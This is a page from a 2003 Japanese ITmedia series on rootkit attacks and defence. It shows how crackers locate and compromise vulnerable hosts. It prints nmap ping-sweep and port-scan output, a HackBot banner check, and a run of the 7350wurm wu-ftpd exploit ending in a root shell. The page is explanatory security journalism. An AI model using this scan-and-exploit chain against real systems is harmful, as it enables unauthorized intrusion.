エンタープライズ:特集 2003/03/28 17:09:00 更新

rootkitによるハッキングとその防御
第4回 rootkitを利用した侵入 (2/5)

どのようにしてクラッカーはシステムに侵入するのか?

 多くのクラッカーがコンピュータへの侵入口として利用するのは、既知のセキュリティホールであり、脆弱性があるにもかかわらず対策がとられていないコンピュータが狙われやすい。この点については説明するまでもないだろう。では、クラッカーがそういったコンピュータを探し出すにはどういった手順を踏むのだろうか。

 特定のターゲットへ侵入を試みる場合は別として、無差別に脆弱性のあるコンピュータに侵入する場合であれば、たとえば、単純に下記のような方法を、クラッカーは取るかもしれない。

■適当に指定した範囲でインターネット上に接続されているコンピュータをスキャン
・Ping Sweep
# nmap -sP 192.168.1.0/24

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host (192.168.1.0) seems to be a subnet broadcast address (returned 3 extra pings).
Host (192.168.1.1) appears to be up.
Host (192.168.1.3) appears to be up.
Host (192.168.1.12) appears to be up.
Host (192.168.1.14) appears to be up.
Host (192.168.1.15) appears to be up.
Host (192.168.1.255) seems to be a subnet broadcast address (returned 5 extra pings).
Nmap run completed -- 256 IP addresses (5 hosts up) scanned in 6 seconds

■さらに接続されているコンピュータ上をスキャンし、セキュリティホールがあるサービスが動いているかチェック
・ポートスキャン
$ nmap -sS -O 192.168.1.15

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.1.15):
(The 1599 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
Remote operating system guess: Linux Kernel 2.4.0 - 2.5.20
Uptime 0.211 days (since Sun Mar 23 19:48:30 2003)

Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds

・サービス名およびバージョンのチェック
$ ./hack.pl -A 192.168.1.15
###############################################################
#      HackBot v2.20 2003 / http://***.***.**/hackbot/        #
#               (c) 2000-2003 Marco van Berkum                #
#                                                             #
# Marco van Berkum            - m.v.berkum@obit.nl            #
# Kristian Vlaardingerbroek   - kris@obit.nl                  #
# Pepijn Vissers              - zoef@zoefdehaas.nl            #
# Martijn Mooijman            - foobar@obit.nl                #
# Herman Poortermans          - herman@ofzo.nl                #
###############################################################
Checking 192.168.1.15 ...
Checking for FTP server
-----------------------
FTP Server Found:
220 linux2 FTP server (Version wu-2.6.1-16) ready.
331 Guest login ok, send your complete e-mail address as password.
Anonymous login allowed!
550 upload: No such file or directory.
Checking for SSH
----------------
SSH-1.99-OpenSSH_2.5.2p2
--->
- All scans done. Hackbot 2.20 -
---> Exiting.

 このスキャン結果からターゲットを絞り込み、アタックツールを実行する。

■侵入
# ./wu -a -d 192.168.1.15
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!
# trying to log into 192.168.1.15 with (ftp/mozilla@) ... connected.
# banner: 220 linux2 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
        building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 19:37:14 EDT 2001 i686 unknown

 これだけで侵入には成功している。しかし、これまで数多く出現したワーム類の感染方法を例にあげるまでもなく、無差別に侵入するのであればはじめから

  • 特定のセキュリティホールのあるサービスが動いているコンピュータのみをスキャンする

もしくは

  • 特定のセキュリティホールのあるサービスが動いているコンピュータのみをスキャンし、ターゲットととなるコンピュータがあれば自動的にアタックさせる

という方法をとるだろう。

 たとえば上記では、wu-ftpdの古いセキュリティホールを利用した侵入例を紹介している(もちろんすでに対策済み)が、こういったアタック自体を、ある範囲のネットワークを指定して自動的に行えば、余計な手順なしに侵入できるわけだ。

前のページ | 1 2 3 4 5 | 次のページ

[TTS,ITmedia]